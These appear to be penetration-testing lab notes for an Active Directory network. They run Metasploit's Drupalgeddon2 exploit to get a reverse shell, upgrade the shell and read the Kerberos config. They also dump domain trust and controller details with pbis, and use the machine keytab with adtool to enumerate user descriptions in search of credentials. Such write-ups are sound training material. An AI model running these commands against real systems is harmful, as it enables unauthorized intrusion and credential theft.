sudo msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS 10.9.15.11; set LHOST tun0; set LPORT 8081; exploit"
Upgrading the Shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
cat /etc/krb5.conf
Using pbis tools
www-data@corewebdl:/opt/pbis/bin$ ./get-status./get-statusLSA Server Status:Compiled daemon version: 8.8.0.506Packaged product version: 8.8.506.0Uptime: 0 days 4 hours 56 minutes 27 seconds[Authentication provider: lsa-activedirectory-provider] Status: Online Mode: Un-provisioned Domain: CORE.CYBER.LOCAL Domain SID: S-1-5-21-1559563558-3652093953-1250159885 Forest: cyber.local Site: core Online check interval: 300 seconds [Trusted Domains: 5] [Domain: core] DNS Domain: core.cyber.local Netbios name: core Forest name: cyber.local Trustee DNS name: Client site name: core Domain SID: S-1-5-21-1559563558-3652093953-1250159885 Domain GUID: 00000000-0000-0000-0000-000000000000 Trust Flags: [0x0019] [0x0001 - In forest] [0x0008 - Primary] [0x0010 - Native] Trust type: Up Level Trust Attributes: [0x0000] Trust Direction: Primary Domain Trust Mode: In my forest Trust (MFT) Domain flags: [0x0001] [0x0001 - Primary] [Domain Controller (DC) Information] DC Name: coredc.core.cyber.local DC Address: 10.9.15.10 DC Site: core DC Flags: [0x0003f3fd] DC Is PDC: yes DC is time server: yes DC has writeable DS: yes DC is Global Catalog: yes DC is running KDC: yes [Global Catalog (GC) Information] GC Name: coredc.core.cyber.local GC Address: 10.9.15.10 GC Site: core GC Flags: [0x0003f3fd] GC Is PDC: yes GC is time server: yes GC has writeable DS: yes GC is running KDC: yes [Domain: CYBER] DNS Domain: cyber.local Netbios name: CYBER Forest name: cyber.local Trustee DNS name: CORE.CYBER.LOCAL Client site name: Core Domain SID: S-1-5-21-2011815209-557191040-1566801441 Domain GUID: 00000000-0000-0000-0000-000000000000 Trust Flags: [0x0027] [0x0001 - In forest] [0x0002 - Outbound] [0x0004 - Tree root] [0x0020 - Inbound] Trust type: Up Level Trust Attributes: [0x0020] [0x0020 - Within forest] Trust Direction: Twoway Trust Trust Mode: In my forest Trust (MFT) Domain flags: [0x0000] [Domain Controller (DC) Information] DC Name: cydc.cyber.local DC Address: 10.9.10.10 DC Site: Root DC Flags: [0x0003f37d] DC Is PDC: yes DC is time server: yes DC has writeable DS: yes DC is Global Catalog: yes DC is running KDC: yes [Global Catalog (GC) Information] GC Name: coredc.core.cyber.local GC Address: 10.9.15.10 GC Site: core GC Flags: [0x0003f3fd] GC Is PDC: yes GC is time server: yes GC has writeable DS: yes GC is running KDC: yes [Domain: D3V] DNS Domain: d3v.local Netbios name: D3V Forest name: d3v.local Trustee DNS name: cyber.local Client site name: Default-First-Site-Name Domain SID: S-1-5-21-1741135793-2392241712-4132009386 Domain GUID: 00000000-0000-0000-0000-000000000000 Trust Flags: [0x0022] [0x0002 - Outbound] [0x0020 - Inbound] Trust type: Up Level Trust Attributes: [0x0008] [0x0008 - Forest transitive] Trust Direction: Twoway Trust Trust Mode: In other forest Trust (OFT) Domain flags: [0x0000] [Domain Controller (DC) Information] DC Name: d3dc.d3v.local DC Address: 10.9.30.10 DC Site: Default-First-Site-Name DC Flags: [0x0003f3fd] DC Is PDC: yes DC is time server: yes DC has writeable DS: yes DC is Global Catalog: yes DC is running KDC: yes [Domain: M3C] DNS Domain: m3c.local Netbios name: M3C Forest name: m3c.local Trustee DNS name: cyber.local Client site name: Default-First-Site-Name Domain SID: S-1-5-21-340507432-2615605230-720798708 Domain GUID: 00000000-0000-0000-0000-000000000000 Trust Flags: [0x0020] [0x0020 - Inbound] Trust type: Up Level Trust Attributes: [0x0008] [0x0008 - Forest transitive] Trust Direction: Zeroway Trust Trust Mode: In other forest Trust (OFT) Domain flags: [0x0000] [Domain Controller (DC) Information] DC Name: m3dc.m3c.local DC Address: 10.9.20.10 DC Site: Default-First-Site-Name DC Flags: [0x0001f3fd] DC Is PDC: yes DC is time server: yes DC has writeable DS: yes DC is Global Catalog: yes DC is running KDC: yes [Domain: inception] DNS Domain: inception.local Netbios name: inception Forest name: inception.local Trustee DNS name: cyber.local Client site name: Default-First-Site-Name Domain SID: S-1-5-21-3923830851-530095044-3265323199 Domain GUID: 00000000-0000-0000-0000-000000000000 Trust Flags: [0x0022] [0x0002 - Outbound] [0x0020 - Inbound] Trust type: Up Level Trust Attributes: [0x0008] [0x0008 - Forest transitive] Trust Direction: Twoway Trust Trust Mode: In other forest Trust (OFT) Domain flags: [0x0000] [Domain Controller (DC) Information] DC Name: indc.inception.local DC Address: 10.9.40.5 DC Site: Default-First-Site-Name DC Flags: [0x0003f3fd] DC Is PDC: yes DC is time server: yes DC has writeable DS: yes DC is Global Catalog: yes DC is running KDC: yes
Using adtool in linux
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done
